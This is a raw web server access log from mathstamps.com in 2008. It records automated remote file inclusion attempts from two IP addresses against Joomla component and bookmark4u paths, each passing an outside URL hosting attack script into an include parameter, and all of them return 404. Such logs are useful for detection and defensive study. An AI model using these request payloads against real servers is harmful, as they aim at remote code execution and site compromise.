88.191.27.47 - - [29/Jun/2008:23:13:21 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://www.cartographia.org/administrator/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.191.27.47 - - [29/Jun/2008:23:13:23 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.cartographia.org/administrator/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.191.27.47 - - [29/Jun/2008:23:13:40 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.cartographia.org/administrator/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
212.220.139.98 - - [29/Jun/2008:23:14:28 -0700] "GET /logs/access_080526.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.spsss.ru/exhibition/mc?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
212.220.139.98 - - [29/Jun/2008:23:14:29 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.spsss.ru/exhibition/mc?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
212.220.139.98 - - [29/Jun/2008:23:14:31 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.spsss.ru/exhibition/mc?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
88.191.27.47 - - [29/Jun/2008:23:15:07 -0700] "GET /logs/access_080421.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.191.27.47 - - [29/Jun/2008:23:15:23 -0700] "GET /logs/access_080526.log//components/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.cartographia.org/administrator/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.191.27.47 - - [29/Jun/2008:23:15:38 -0700] "GET /logs/access_080428.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.191.27.47 - - [29/Jun/2008:23:16:21 -0700] "GET /logs/access_080421.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.191.27.47 - - [29/Jun/2008:23:16:53 -0700] "GET /logs/access_080428.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.191.27.47 - - [29/Jun/2008:23:17:03 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.cartographia.org/administrator/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
74.6.8.118 - - [29/Jun/2008:23:17:07 -0700] "GET /?S=A HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
88.191.27.47 - - [29/Jun/2008:23:18:28 -0700] "GET /logs/access_080421.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
74.6.8.118 - - [29/Jun/2008:23:18:51 -0700] "GET /?S=D HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
88.191.27.47 - - [29/Jun/2008:23:18:55 -0700] "GET /logs/access_080421.log//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.191.27.47 - - [29/Jun/2008:23:19:04 -0700] "GET /logs/access_080428.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.191.27.47 - - [29/Jun/2008:23:19:05 -0700] "GET /logs/access_080421.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.191.27.47 - - [29/Jun/200